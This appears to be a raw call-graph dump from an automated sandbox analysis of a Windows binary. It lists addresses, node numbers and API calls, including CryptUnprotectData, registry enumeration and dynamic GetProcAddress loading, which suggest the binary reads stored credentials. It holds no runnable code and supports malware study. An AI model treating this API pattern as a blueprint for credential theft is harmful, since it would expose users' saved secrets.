40df8f CloseHandle 39075->39080 39081 40df78 39075->39081 39076->39075 39077->39075 39078 40df4c memset 39077->39078 39079 41352f 9 API calls 39078->39079 39079->39075 39080->39081 39081->39076 39081->39080 39082 40dfae _wcsicmp 39081->39082 39082->39075 39082->39081 39084 409a74 GetTempFileNameW 39083->39084 39085 409a66 GetWindowsDirectoryW 39083->39085 39084->38996 39085->39084 39086->38998 39088 406bd5 39087->39088 39089 406bad 39087->39089 39091 4066bf ??3@YAXPAX malloc memcpy ??3@YAXPAX ??3@YAXPAX 39088->39091 39096 406c0f 39088->39096 39089->39088 39090 406bba _wcsicmp 39089->39090 39090->39088 39090->39089 39092 406be5 39091->39092 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39092->39093 39092->39096 39094 406bff 39093->39094 39095 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39094->39095 39095->39096 39096->39007 39096->39008 39098 4069c4 ??3@YAXPAX 39097->39098 39099 4069af 39098->39099 39100 40b633 ??3@YAXPAX 39099->39100 39101 4069ba 39100->39101 39102 40b04b ??3@YAXPAX 39101->39102 39103 4069c2 39102->39103 39103->38976 39104->39013 39105->39013 39106->39013 39107->39013 39108->39031 39109->39038 39111 40aa33 39110->39111 39112 40aa63 39110->39112 39113 40aa44 39111->39113 39114 40aa38 wcslen 39111->39114 39112->39031 39115 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39113->39115 39114->39113 39116 40aa4d 39115->39116 39116->39112 39117 40aa51 memcpy 39116->39117 39117->39112 39118->39031 39119->39031 39121 40a980 39120->39121 39122 40a8bb 39121->39122 39123 40a995 _wcsicmp 39121->39123 39124 40a99c wcscmp 39121->39124 39122->38886 39122->38887 39123->39121 39124->39121 39125->38890 39126->38894 39128 40aa23 RegEnumValueW 39127->39128 39128->38901 39128->38902 39130 405335 39129->39130 39131 40522a 39129->39131 39130->38487 39132 40b2cc 27 API calls 39131->39132 39133 405234 39132->39133 39134 40a804 8 API calls 39133->39134 39135 40523a 39134->39135 39174 40b273 39135->39174 39137 405248 _mbscpy _mbscat GetProcAddress 39138 40b273 27 API calls 39137->39138 39139 405279 39138->39139 39177 405211 GetProcAddress 39139->39177 39141 405282 39142 40b273 27 API calls 39141->39142 39143 40528f 39142->39143 39178 405211 GetProcAddress 39143->39178 39145 405298 39146 40b273 27 API calls 39145->39146 39147 4052a5 39146->39147 39179 405211 GetProcAddress 39147->39179 39149 4052ae 39150 40b273 27 API calls 39149->39150 39151 4052bb 39150->39151 39180 405211 GetProcAddress 39151->39180 39153 4052c4 39154 40b273 27 API calls 39153->39154 39155 4052d1 39154->39155 39181 405211 GetProcAddress 39155->39181 39157 4052da 39158 40b273 27 API calls 39157->39158 39159 4052e7 39158->39159 39182 405211 GetProcAddress 39159->39182 39161 4052f0 39162 40b273 27 API calls 39161->39162 39163 4052fd 39162->39163 39183 405211 GetProcAddress 39163->39183 39165 405306 39166 40b273 27 API calls 39165->39166 39167 405313 39166->39167 39184 405211 GetProcAddress 39167->39184 39169 40531c 39170 40b273 27 API calls 39169->39170 39171 405329 39170->39171 39185 405211 GetProcAddress 39171->39185 39175 40b58d 27 API calls 39174->39175 39176 40b18c 39175->39176 39176->39137 39177->39141 39178->39145 39179->39149 39180->39153 39181->39157 39182->39161 39183->39165 39184->39169 39187 405220 39 API calls 39186->39187 39188 405369 39187->39188 39188->38919 39188->38920 39189->38922 39190->38926 39191->38923 39192->38920 39194 40440c FreeLibrary 39193->39194 39195 40436d 39194->39195 39196 40a804 8 API calls 39195->39196 39197 404377 39196->39197 39198 404383 39197->39198 39199 404405 39197->39199 39200 40b273 27 API calls 39198->39200 39199->38492 39199->38494 39199->38495 39201 40438d GetProcAddress 39200->39201 39202 40b273 27 API calls 39201->39202 39203 4043a7 GetProcAddress 39202->39203 39204 40b273 27 API calls 39203->39204 39205 4043ba GetProcAddress 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4043ce GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4043e2 GetProcAddress 39208->39209 39210 4043f1 39209->39210 39211 4043f7 39210->39211 39212 40440c FreeLibrary 39210->39212 39211->39199 39212->39199 39214 404413 FreeLibrary 39213->39214 39215 40441e 39213->39215 39214->39215 39215->38509 39216->38503 39218 40447e 39217->39218 39219 40442e 39217->39219 39220 404485 CryptUnprotectData 39218->39220 39221 40449c 39218->39221 39222 40b2cc 27 API calls 39219->39222 39220->39221 39221->38503 39223 404438 39222->39223 39224 40a804 8 API calls 39223->39224 39225 40443e 39224->39225 39226 404445 39225->39226 39227 404467 39225->39227 39228 40b273 27 API calls 39226->39228 39227->39218 39230 404475 FreeLibrary 39227->39230 39229 40444f GetProcAddress 39228->39229 39229->39227 39231 404460 39229->39231 39230->39218 39231->39227 39233 4135f6 39232->39233 39234 4135eb FreeLibrary 39232->39234 39233->38512 39234->39233 39236 4449c4 39235->39236 39237 444a52 39235->39237 39238 40b2cc 27 API calls 39236->39238 39237->38529 39237->38530 39239 4449cb 39238->39239 39240 40a804 8 API calls 39239->39240 39241 4449d1 39240->39241 39242 40b273 27 API calls 39241->39242 39243 4449dc GetProcAddress 39242->39243 39244 40b273 27 API calls 39243->39244 39245 4449f3 GetProcAddress 39244->39245 39246 40b273 27 API calls 39245->39246 39247 444a04 GetProcAddress 39246->39247 39248 40b273 27 API calls 39247->39248 39249 444a15 GetProcAddress 39248->39249 39250 40b273 27 API calls 39249->39250 39251 444a26 GetProcAddress 39250->39251 39252 40b273 27 API calls 39251->39252 39256->38540 39257->38540 39258->38540 39259->38540 39260->38531 39262 403a29 39261->39262 39276 403bed memset memset 39262->39276 39264 403ae7 39289 40b1ab ??3@YAXPAX ??3@YAXPAX 39264->39289 39265 403a3f memset 39270 403a2f 39265->39270 39267 403aef 39267->38548 39268 40a8d0 7 API calls 39268->39270 39269 409d1f 6 API calls 39269->39270 39270->39264 39270->39265 39270->39268 39270->39269 39271 409b98 GetFileAttributesW 39270->39271 39271->39270 39273 40a051 GetFileTime FindCloseChangeNotification 39272->39273 39274 4039ca CompareFileTime 39272->39274 39273->39274 39274->38548 39275->38547 39277 414c2e 17 API calls 39276->39277 39278 403c38 39277->39278 39279 409719 2 API calls 39278->39279 39280 403c3f wcscat 39279->39280 39281 414c2e 17 API calls 39280->39281 39282 403c61 39281->39282 39283 409719 2 API calls 39282->39283 39284 403c68 wcscat 39283->39284 39290 403af5 39284->39290 39287 403af5 20 API calls 39288 403c95 39287->39288 39288->39270 39289->39267 39291 403b02 39290->39291 39292 40ae18 9 API calls 39291->39292 39300 403b37 39292->39300 39293 403bdb 39294 40aebe FindClose 39293->39294 39295 403be6 39294->39295 39295->39287 39296 40ae18 9 API calls 39296->39300 39297 40ae51 9 API calls 39297->39300 39298 40aebe FindClose 39298->39300 39299 40add4 wcscmp wcscmp 39299->39300 39300->39293 39300->39296 39300->39297 39300->39298 39300->39299 39301 40a8d0 7 API calls 39300->39301 39301->39300 39303 409d1f 6 API calls 39302->39303 39304 404190 39303->39304 39317 409b98 GetFileAttributesW 39304->39317 39306 40419c 39307 4041a7 6 API calls 39306->39307 39308 40435c 39306->39308 39310 40424f 39307->39310 39308->38574 39310->39308 39311 40425e memset 39310->39311 39313 409d1f 6 API calls 39310->39313 39314 40a8ab 9 API calls 39310->39314 39318 414842 39310->39318 39311->39310 39312 404296 wcscpy 39311->39312 39312->39310 39313->39310 39315 4042b6 memset memset _snwprintf wcscpy 39314->39315 39315->39310 39316->38572 39317->39306 39321 41443e 39318->39321 39320 414866 39320->39310 39322 41444b 39321->39322 39323 414451 39322->39323 39324 4144a3 GetPrivateProfileStringW 39322->39324 39325 414491 39323->39325 39326 414455 wcschr 39323->39326 39324->39320 39328 414495 WritePrivateProfileStringW 39325->39328 39326->39325 39327 414463 _snwprintf 39326->39327 39327->39328 39328->39320 39329->38578 39331 40b2cc 27 API calls 39330->39331 39332 409615 39331->39332 39333 409d1f 6 API calls 39332->39333 39334 409625 39333->39334 39359 409b98 GetFileAttributesW 39334->39359 39336 409634 39337 409648 39336->39337 39360 4091b8 memset 39336->39360 39339 40b2cc 27 API calls 39337->39339 39342 408801 39337->39342 39340 40965d 39339->39340 39341 409d1f 6 API calls 39340->39341 39343 40966d 39341->39343 39342->38581 39342->38609 39412 409b98 GetFileAttributesW 39343->39412 39345 40967c 39345->39342 39346 409681 39345->39346 39413 409529 72 API calls 39346->39413 39348 409690 39348->39342 39359->39336 39414 40a6e6 WideCharToMultiByte 39360->39414 39362 409202 39415 444432 39362->39415 39365 40b273 27 API calls 39366 409236 39365->39366 39461 438552 39366->39461 39369 409383 39371 40b273 27 API calls 39369->39371 39372 409399 39371->39372 39392 40951d 39392->39337 39412->39345 39413->39348 39414->39362 39511 4438b5 39415->39511 39417 44444c 39418 409215 39417->39418 39525 415a6d 39417->39525 39418->39365 39418->39392 39420 4442e6 11 API calls 39422 44469e 39420->39422 39421 444486 39423 4444b9 memcpy 39421->39423 39460 4444a4 39421->39460 39422->39418 39425 443d90 111 API calls 39422->39425 39529 415258 39423->39529 39425->39418 39426 444524 39427 444541 39426->39427 39428 44452a 39426->39428 39532 444316 39427->39532 39429 416935 16 API calls 39428->39429 39429->39460 39432 444316 18 API calls 39433 444563 39432->39433 39460->39420 39646 438460 39461->39646 39463 409240 39463->39369 39464 4251c4 39463->39464 39697 424f07 39464->39697 39512 4438d0 39511->39512 39522 4438c9 39511->39522 39599 415378 memcpy memcpy 39512->39599 39522->39417 39526 415a77 39525->39526 39527 415a8d 39526->39527 39528 415a7e memset 39526->39528 39527->39421 39528->39527 39530 4438b5 11 API calls 39529->39530 39531 41525d 39530->39531 39531->39426 39533 444328 39532->39533 39534 444423 39533->39534 39535 44434e 39533->39535 39600 4446ea 11 API calls 39534->39600 39536 432d4e 3 API calls 39535->39536 39538 44435a 39536->39538 39540 444375 39538->39540 39545 44438b 39538->39545 39543 444381 39543->39432 39600->39543 39658 41703f 39646->39658 39648 43847a 39649 43848a 39648->39649 39650 43847e 39648->39650 39665 438270 39649->39665 39695 4446ea 11 API calls 39650->39695 39657 438488 39657->39463 39659 417044 39658->39659 39660 41705c 39658->39660 39662 416760 11 API calls 39659->39662 39664 417055 39659->39664 39661 417075 39660->39661 39663 41707a 11 API calls 39660->39663 39661->39648 39662->39664 39663->39659 39664->39648 39666 415a91 memset 39665->39666 39667 43828d 39666->39667 39668 438297 39667->39668 39669 438341 39667->39669 39671 4382d6 39667->39671 39670 415c7d 16 API calls 39668->39670 39672 44358f 19 API calls 39669->39672 39673 438458 39670->39673 39674 4382fb 39671->39674 39675 4382db 39671->39675 39685 438318 39672->39685 39673->39657 39677 415c23 memcpy 39674->39677 39676 416935 16 API calls 39675->39676 39681 438373 39683 43819e 115 API calls 39683->39681 39685->39681 39685->39683 39695->39657 39698 424f1f 39697->39698 39699 424f0c 39697->39699 39785 413f4f 39758->39785 39761 413f37 K32GetModuleFileNameExW 39762 413f4a 39761->39762 39762->38638 39764 413969 wcscpy 39763->39764 39765 41396c wcschr 39763->39765 39776 413a3a 39764->39776 39765->39764 39767 41398e 39765->39767 39790 4097f7 wcslen wcslen _memicmp 39767->39790 39769 41399a 39770 4139a4 memset 39769->39770 39771 4139e6 39769->39771 39791 409dd5 GetWindowsDirectoryW wcscpy 39770->39791 39773 413a31 wcscpy 39771->39773 39774 4139ec memset 39771->39774 39773->39776 39792 409dd5 GetWindowsDirectoryW wcscpy 39774->39792 39776->38638 39777 4139c9 wcscpy wcscat 39777->39776 39778 413a11 memcpy wcscat 39778->39776 39780 413cb0 GetModuleHandleW 39779->39780 39781 413cda 39779->39781 39780->39781 39782 413cbf GetProcAddress 39780->39782 39783 413ce3 GetProcessTimes 39781->39783 39784 413cf6 39781->39784 39782->39781 39783->38643 39784->38643 39786 413f2f 39785->39786 39787 413f54 39785->39787 39786->39761 39786->39762 39788 40a804 8 API calls 39787->39788 39789 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39788->39789 39789->39786 39790->39769 39791->39777 39792->39778 39793->38663 39794->38687 39796 409cf9 GetVersionExW 39795->39796 39797 409d0a 39795->39797 39796->39797 39797->38693 39797->38698 39798->38699 39799->38703 39800->38705 39801->38770 39803 40bba5 39802->39803 39847 40cc26 39803->39847 39806 40bd4b 39868 40cc0c 39806->39868 39811 40b2cc 27 API calls 39812 40bbef 39811->39812 39875 40ccf0 _wcsicmp 39812->39875 39814 40bbf5 39814->39806 39876 40ccb4 6 API calls 39814->39876 39816 40bc26 39817 40cf04 17 API calls 39816->39817 39818 40bc2e 39817->39818 39819 40bd43 39818->39819 39820 40b2cc 27 API calls 39818->39820 39821 40cc0c 4 API calls 39819->39821 39822 40bc40 39820->39822 39821->39806 39877 40ccf0 _wcsicmp 39822->39877 39824 40bc46 39824->39819 39825 40bc61 memset memset WideCharToMultiByte 39824->39825 39878 40103c strlen 39825->39878 39827 40bcc0 39828 40b273 27 API calls 39827->39828 39829 40bcd0 memcmp 39828->39829 39829->39819 39830 40bce2 39829->39830 39831 404423 38 API calls 39830->39831 39832 40bd10 39831->39832 39832->39819 39833 40bd3a LocalFree 39832->39833 39834 40bd1f memcpy 39832->39834 39833->39819 39834->39833 39835->38785 39836->38822 39837->38822 39838->38822 39839->38822 39840->38822 39841->38822 39842->38822 39843->38822 39844->38822 39845->38797 39846->38819 39879 4096c3 CreateFileW 39847->39879 39849 40cc34 39850 40cc3d GetFileSize 39849->39850 39858 40bbca 39849->39858 39851 40afcf 2 API calls 39850->39851 39852 40cc64 39851->39852 39880 40a2ef ReadFile 39852->39880 39854 40cc71 39881 40ab4a MultiByteToWideChar 39854->39881 39856 40cc95 FindCloseChangeNotification 39857 40b04b ??3@YAXPAX 39856->39857 39857->39858 39858->39806 39859 40cf04 39858->39859 39860 40b633 ??3@YAXPAX 39859->39860 39861 40cf14 39860->39861 39887 40b1ab ??3@YAXPAX ??3@YAXPAX 39861->39887 39863 40cf1b 39864 40cfef 39863->39864 39867 40bbdd 39863->39867 39888 40cd4b 39863->39888 39866 40cd4b 14 API calls 39864->39866 39866->39867 39867->39806 39867->39811 39869 40b633 ??3@YAXPAX 39868->39869 39870 40cc15 39869->39870 39871 40aa04 ??3@YAXPAX 39870->39871 39872 40cc1d 39871->39872 39929 40b1ab ??3@YAXPAX ??3@YAXPAX 39872->39929 39874 40b7d4 memset CreateFileW 39874->38777 39874->38778 39875->39814 39876->39816 39877->39824 39878->39827 39879->39849 39880->39854 39882 40ab93 39881->39882 39883 40ab6b 39881->39883 39882->39856 39884 40a9ce 4 API calls 39883->39884 39885 40ab74 39884->39885 39886 40ab7c MultiByteToWideChar 39885->39886 39886->39882 39887->39863 39889 40cd7b 39888->39889 39890 40aa29 6 API calls 39889->39890 39894 40cd89 39890->39894 39891 40cef5 39892 40aa04 ??3@YAXPAX 39891->39892 39893 40cefd 39892->39893 39893->39863 39894->39891 39895 40aa29 6 API calls 39894->39895 39896 40ce1d 39895->39896 39897 40aa29 6 API calls 39896->39897 39898 40ce3e 39897->39898 39899 40ce6a 39898->39899 39922 40abb7 wcslen memmove 39898->39922 39900 40ce9f 39899->39900 39925 40abb7 wcslen memmove 39899->39925 39903 40a8d0 7 API calls 39900->39903 39906 40ceb5 39903->39906 39904 40ce56 39923 40aa71 wcslen 39904->39923 39905 40ce8b 39926 40aa71 wcslen 39905->39926 39911 40a8d0 7 API calls 39906->39911 39908 40ce5e 39924 40abb7 wcslen memmove 39908->39924 39913 40cecb 39911->39913 39912 40ce93 39927 40abb7 wcslen memmove 39912->39927 39928 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39913->39928 39916 40cedd 39917 40aa04 ??3@YAXPAX 39916->39917 39918 40cee5 39917->39918 39919 40aa04 ??3@YAXPAX 39918->39919 39920 40ceed 39919->39920 39921 40aa04 ??3@YAXPAX 39920->39921 39921->39891 39922->39904 39923->39908 39924->39899 39925->39905 39926->39912 39927->39900 39928->39916 39929->39874 39930->38837 39931->38845 39932 427533 39936 427548 39932->39936 39945 425711 39932->39945 39933 4259da 39989 416760 11 API calls 39933->39989 39935 4275cb 39969 425506 39935->39969 39936->39935 39943 429b7a 39936->39943 39937 4260dd 39990 424251 120 API calls 39937->39990 39938 4259c2 39965 425ad6 39938->39965 39983 415c56 11 API calls 39938->39983 39995 4446ce 11 API calls 39943->39995 39945->39933 39945->39938 39948 429a4d 39945->39948 39951 422aeb memset memcpy memcpy 39945->39951 39955 4260a1 39945->39955 39961 429ac1 39945->39961 39968 425a38 39945->39968 39979 4227f0 memset memcpy 39945->39979 39980 422b84 15 API calls 39945->39980 39981 422b5d memset memcpy memcpy 39945->39981 39982 422640 13 API calls 39945->39982 39984 4241fc 11 API calls 39945->39984 39985 42413a 90 API calls 39945->39985 39949 429a66 39948->39949 39950 429a9b 39948->39950 39991 415c56 11 API calls 39949->39991 39954 429a96 39950->39954 39993 416760 11 API calls 39950->39993 39951->39945 39994 424251 120 API calls 39954->39994 39988 415c56 11 API calls 39955->39988 39957 429a7a 39992 416760 11 API calls 39957->39992 39961->39933 39961->39965 39996 415c56 11 API calls 39961->39996 39968->39938 39986 422640 13 API calls 39968->39986 39987 4226e0 12 API calls 39968->39987 39970 42554d 39969->39970 39973 425554 39969->39973 39997 423b34 103 API calls 39970->39997 39998 422586 12 API calls 39973->39998 39974 425567 39975 4255ba 39974->39975 39976 42556c memset 39974->39976 39975->39945 39977 425596 39976->39977 39977->39975 39978 4255a4 memset 39977->39978 39978->39975 39979->39945 39980->39945 39981->39945 39982->39945 39983->39933 39984->39945 39985->39945 39986->39968 39987->39968 39988->39933 39989->39937 39990->39965 39991->39957 39992->39954 39993->39954 39994->39961 39995->39961 39996->39933 39997->39973 39998->39974 39999 4147f3 40002 414561 39999->40002 40001 414813 40003 41456d 40002->40003 40004 41457f GetPrivateProfileIntW 40002->40004 40007 4143f1 memset _itow WritePrivateProfileStringW 40003->40007 40004->40001 40006 41457a 40006->40001 40007->40006 40008 44def7 40009 44df07 40008->40009 40010 44df00 ??3@YAXPAX 40008->40010 40011 44df17 40009->40011 40012 44df10 ??3@YAXPAX 40009->40012 40010->40009 40013 44df27 40011->40013 40014 44df20 ??3@YAXPAX 40011->40014 40012->40011 40015 44df37 40013->40015 40016 44df30 ??3@YAXPAX 40013->40016 40014->40013 40016->40015 40017 4148b6 FindResourceW 40018 4148cf SizeofResource 40017->40018 40021 4148f9 40017->40021 40019 4148e0 LoadResource 40018->40019 40018->40021 40020 4148ee LockResource 40019->40020 40019->40021 40020->40021 40022 441b3f 40032 43a9f6 40022->40032 40024 441b61 40205 4386af memset 40024->40205 40026 44189a 40027 442bd4 40026->40027 40028 4418e2 40026->40028 40029 4418ea 40027->40029 40207 441409 memset 40027->40207 40028->40029 40206 4414a9 12 API calls 40028->40206 40033 43aa20 40032->40033 40034 43aadf 40032->40034 40033->40034 40035 43aa34 memset 40033->40035 40034->40024 40036 43aa56 40035->40036 40037 43aa4d 40035->40037 40208 43a6e7 40036->40208 40216 42c02e memset 40037->40216 40042 43aad3 40218 4169a7 11 API calls 40042->40218 40043 43aaae 40043->40034 40043->40042 40058 43aae5 40043->40058 40045 43ac18 40047 43ac47 40045->40047 40220 42bbd5 memcpy memcpy memcpy memset memcpy 40045->40220 40048 43aca8 40047->40048 40221 438eed 16 API calls 40047->40221 40052 43acd5 40048->40052 40223 4233ae 11 API calls 40048->40223 40051 43ac87 40222 4233c5 16 API calls 40051->40222 40224 423426 11 API calls 40052->40224 40056 43ace1 40225 439811 163 API calls 40056->40225 40057 43a9f6 161 API calls 40057->40058 40058->40034 40058->40045 40058->40057 40219 439bbb 22 API calls 40058->40219 40060 43acfd 40066 43ad2c 40060->40066 40226 438eed 16 API calls 40060->40226 40062 43ad19 40227 4233c5 16 API calls 40062->40227 40063 43ad58 40228 44081d 163 API calls 40063->40228 40066->40063 40069 43add9 40066->40069 40068 43ae3a memset 40070 43ae73 40068->40070 40069->40069 40232 423426 11 API calls 40069->40232 40233 42e1c0 147 API calls 40070->40233 40071 43adab 40230 438c4e 163 API calls 40071->40230 40073 43ad6c 40073->40034 40073->40071 40229 42370b memset memcpy memset 40073->40229 40075 43ae96 40234 42e1c0 147 API calls 40075->40234 40077 43adcc 40231 440f84 12 API calls 40077->40231 40080 43aea8 40081 43aec1 40080->40081 40235 42e199 147 API calls 40080->40235 40083 43af00 40081->40083 40236 42e1c0 147 API calls 40081->40236 40083->40034 40086 43af1a 40083->40086 40087 43b3d9 40083->40087 40237 438eed 16 API calls 40086->40237 40092 43b3f6 40087->40092 40099 43b4c8 40087->40099 40089 43b60f 40089->40034 40296 4393a5 17 API calls 40089->40296 40090 43af2f 40238 4233c5 16 API calls 40090->40238 40278 432878 12 API calls 40092->40278 40094 43af51 40239 423426 11 API calls 40094->40239 40097 43af7d 40240 423426 11 API calls 40097->40240 40098 43b4f2 40285 43a76c 21 API calls 40098->40285 40099->40098 40284 42bbd5 memcpy memcpy memcpy memset memcpy 40099->40284 40103 43b529 40286 44081d 163 API calls 40103->40286 40104 43b428 40130 43b462 40104->40130 40279 432b60 16 API calls 40104->40279 40105 43af94 40241 423330 11 API calls 40105->40241 40109 43b47e 40112 43b497 40109->40112 40281 42374a memcpy memset memcpy memcpy memcpy 40109->40281 40110 43b544 40120 43b55c 40110->40120 40287 42c02e memset 40110->40287 40111 43afca 40242 423330 11 API calls 40111->40242 40282 4233ae 11 API calls 40112->40282 40117 43afdb 40243 4233ae 11 API calls 40117->40243 40119 43b4b1 40283 423399 11 API calls 40119->40283 40288 43a87a 163 API calls 40120->40288 40122 43b56c 40123 43b58a 40122->40123 40289 423330 11 API calls 40122->40289 40290 440f84 12 API calls 40123->40290 40125 43afee 40244 44081d 163 API calls 40125->40244 40128 43b4c1 40292 42db80 163 API calls 40128->40292 40280 423330 11 API calls 40130->40280 40132 43b592 40291 43a82f 16 API calls 40132->40291 40135 43b5b4 40293 438c4e 163 API calls 40135->40293 40137 43b5cf 40294 42c02e memset 40137->40294 40139 43b005 40139->40034 40142 43b01f 40139->40142 40245 42d836 163 API calls 40139->40245 40140 43b1ef 40255 4233c5 16 API calls 40140->40255 40142->40140 40253 423330 11 API calls 40142->40253 40254 42d71d 163 API calls 40142->40254 40143 43b212 40256 423330 11 API calls 40143->40256 40146 43add4 40146->40089 40295 438f86 16 API calls 40146->40295 40149 43b087 40246 4233ae 11 API calls 40149->40246 40151 43b22a 40257 42ccb5 11 API calls 40151->40257 40153 43b10f 40249 423330 11 API calls 40153->40249 40154 43b23f 40258 4233ae 11 API calls 40154->40258 40156 43b257 40259 4233ae 11 API calls 40156->40259 40160 43b129 40250 4233ae 11 API calls 40160->40250 40161 43b26e 40260 4233ae 11 API calls 40161->40260 40164 43b09a 40164->40153 40247 42cc15 19 API calls 40164->40247 40248 4233ae 11 API calls 40164->40248 40165 43b282 40261 43a87a 163 API calls 40165->40261 40167 43b13c 40251 440f84 12 API calls 40167->40251 40169 43b29d 40262 423330 11 API calls 40169->40262 40172 43b15f 40252 4233ae 11 API calls 40172->40252 40173 43b2af 40175 43b2b8 40173->40175 40176 43b2ce 40173->40176 40263 4233ae 11 API calls 40175->40263 40264 440f84 12 API calls 40176->40264 40179 43b2c9 40266 4233ae 11 API calls 40179->40266 40180 43b2da 40265 42370b memset memcpy memset 40180->40265 40183 43b2f9 40267 423330 11 API calls 40183->40267 40185 43b30b 40268 423330 11 API calls 40185->40268 40187 43b325 40269 423399 11 API calls 40187->40269 40189 43b332 40270 4233ae 11 API calls 40189->40270 40191 43b354 40271 423399 11 API calls 40191->40271 40193 43b364 40272 43a82f 16 API calls 40193->40272 40195 43b370 40273 42db80 163 API calls 40195->40273 40197 43b380 40274 438c4e 163 API calls 40197->40274 40199 43b39e 40275 423399 11 API calls 40199->40275 40201 43b3ae 40276 43a76c 21 API calls 40201->40276 40203 43b3c3 40277 423399 11 API calls 40203->40277 40205->40026 40206->40029 40207->40027 40209 43a6f5 40208->40209 40215 43a765 40208->40215 40209->40215 40297 42a115 40209->40297 40213 43a73d 40214 42a115 147 API calls 40213->40214 40213->40215 40214->40215 40215->40034 40217 4397fd memset 40215->40217 40216->40036 40217->40043 40218->40034 40219->40058 40220->40047 40221->40051 40222->40048 40223->40052 40224->40056 40225->40060 40226->40062 40227->40066 40228->40073 40229->40071 40230->40077 40231->40146 40232->40068 40233->40075 40234->40080 40235->40081 40236->40081 40237->40090 40238->40094 40239->40097 40240->40105 40241->40111 40242->40117 40243->40125 40244->40139 40245->40149 40246->40164 40247->40164 40248->40164 40249->40160 40250->40167 40251->40172 40252->40142 40253->40142 40254->40142 40255->40143 40256->40151 40257->40154 40258->40156 40259->40161 40260->40165 40261->40169 40262->40173 40263->40179 40264->40180 40265->40179 40266->40183 40267->40185 40268->40187 40269->40189 40270->40191 40271->40193 40272->40195 40273->40197 40274->40199 40275->40201 40276->40203 40277->40146 40278->40104 40279->40130 40280->40109 40281->40112 40282->40119 40283->40128 40284->40098 40285->40103 40286->40110 40287->40120 40288->40122 40289->40123 40290->40132 40291->40128 40292->40135 40293->40137 40294->40146 40295->40089 40296->40034 40298 42a175 40297->40298 40300 42a122 40297->40300 40298->40215 40303 42b13b 147 API calls 40298->40303 40300->40298 40301 42a115 147 API calls 40300->40301 40304 43a174 40300->40304 40328 42a0a8 147 API calls 40300->40328 40301->40300 40303->40213 40318 43a196 40304->40318 40319 43a19e 40304->40319 40305 43a306 40305->40318 40344 4388c4 14 API calls 40305->40344 40308 42a115 147 API calls 40308->40319 40309 415a91 memset 40309->40319 40310 43a642 40310->40318 40348 4169a7 11 API calls 40310->40348 40314 43a635 40347 42c02e memset 40314->40347 40318->40300 40319->40305 40319->40308 40319->40309 40319->40318 40329 42ff8c 40319->40329 40337 4165ff 40319->40337 40340 439504 13 API calls 40319->40340 40341 4312d0 147 API calls 40319->40341 40342 42be4c memcpy memcpy memcpy memset memcpy 40319->40342 40343 43a121 11 API calls 40319->40343 40321 4169a7 11 API calls 40322 43a325 40321->40322 40322->40310 40322->40314 40322->40318 40322->40321 40323 42b5b5 memset memcpy 40322->40323 40324 42bf4c 14 API calls 40322->40324 40327 4165ff 11 API calls 40322->40327 40345 42b63e 14 API calls 40322->40345 40346 42bfcf memcpy 40322->40346 40323->40322 40324->40322 40327->40322 40328->40300 40349 43817e 40329->40349 40331 42ff99 40332 42ffe3 40331->40332 40333 42ffd0 40331->40333 40336 42ff9d 40331->40336 40354 4169a7 11 API calls 40332->40354 40353 4169a7 11 API calls 40333->40353 40336->40319 40338 4165a0 11 API calls 40337->40338 40339 41660d 40338->40339 40339->40319 40340->40319 40341->40319 40342->40319 40343->40319 40344->40322 40345->40322 40346->40322 40347->40310 40348->40318 40350 438187 40349->40350 40352 438192 40349->40352 40355 4380f6 40350->40355 40352->40331 40353->40336 40354->40336 40357 43811f 40355->40357 40356 438164 40356->40352 40357->40356 40360 437e5e 40357->40360 40383 4300e8 memset memset memcpy 40357->40383 40384 437d3c 40360->40384 40362 437eb3 40362->40357 40363 437ea9 40363->40362 40369 437f22 40363->40369 40399 41f432 40363->40399 40366 437f06 40446 415c56 11 API calls 40366->40446 40368 437f95 40447 415c56 11 API calls 40368->40447 40370 437f7f 40369->40370 40371 432d4e 3 API calls 40369->40371 40370->40368 40372 43802b 40370->40372 40371->40370 40374 4165ff 11 API calls 40372->40374 40375 438054 40374->40375 40410 437371 40375->40410 40378 43806b 40379 438094 40378->40379 40448 42f50e 138 API calls 40378->40448 40380 437fa3 40379->40380 40449 4300e8 memset memset memcpy 40379->40449 40380->40362 40450 41f638 104 API calls 40380->40450 40383->40357 40385 437d69 40384->40385 40388 437d80 40384->40388 40451 437ccb 11 API calls 40385->40451 40387 437d76 40387->40363 40388->40387 40389 437da3 40388->40389 40391 437d90 40388->40391 40392 438460 134 API calls 40389->40392 40391->40387 40455 437ccb 11 API calls 40391->40455 40395 437dcb 40392->40395 40394 437de8 40454 424f26 123 API calls 40394->40454 40395->40394 40452 444283 13 API calls 40395->40452 40397 437dfc 40453 437ccb 11 API calls 40397->40453 40400 41f54d 40399->40400 40406 41f44f 40399->40406 40401 41f466 40400->40401 40485 41c635 memset memset 40400->40485 40401->40366 40401->40369 40406->40401 40408 41f50b 40406->40408 40456 41f1a5 40406->40456 40481 41c06f memcmp 40406->40481 40482 41f3b1 90 API calls 40406->40482 40483 41f398 86 API calls 40406->40483 40408->40400 40408->40401 40484 41c295 86 API calls 40408->40484 40411 41703f 11 API calls 40410->40411 40412 437399 40411->40412 40413 43739d 40412->40413 40416 4373ac 40412->40416 40486 4446ea 11 API calls 40413->40486 40415 4373a7 40415->40378 40417 416935 16 API calls 40416->40417 40418 4373ca 40417->40418 40420 438460 134 API calls 40418->40420 40424 4251c4 137 API calls 40418->40424 40428 415a91 memset 40418->40428 40431 43758f 40418->40431 40443 437584 40418->40443 40445 437d3c 135 API calls 40418->40445 40487 425433 13 API calls 40418->40487 40488 425413 17 API calls 40418->40488 40489 42533e 16 API calls 40418->40489 40490 42538f 16 API calls 40418->40490 40491 42453e 123 API calls 40418->40491 40419 4375bc 40422 415c7d 16 API calls 40419->40422 40420->40418 40423 4375d2 40422->40423 40423->40415 40425 4442e6 11 API calls 40423->40425 40424->40418 40426 4375e2 40425->40426 40426->40415 40494 444283 13 API calls 40426->40494 40428->40418 40492 42453e 123 API calls 40431->40492 40432 4375f4 40437 437620 40432->40437 40438 43760b 40432->40438 40436 43759f 40439 416935 16 API calls 40436->40439 40441 416935 16 API calls 40437->40441 40495 444283 13 API calls 40438->40495 40439->40443 40441->40415 40443->40419 40493 42453e 123 API calls 40443->40493 40444 437612 memcpy 40444->40415 40445->40418 40446->40362 40447->40380 40448->40379 40449->40380 40450->40362 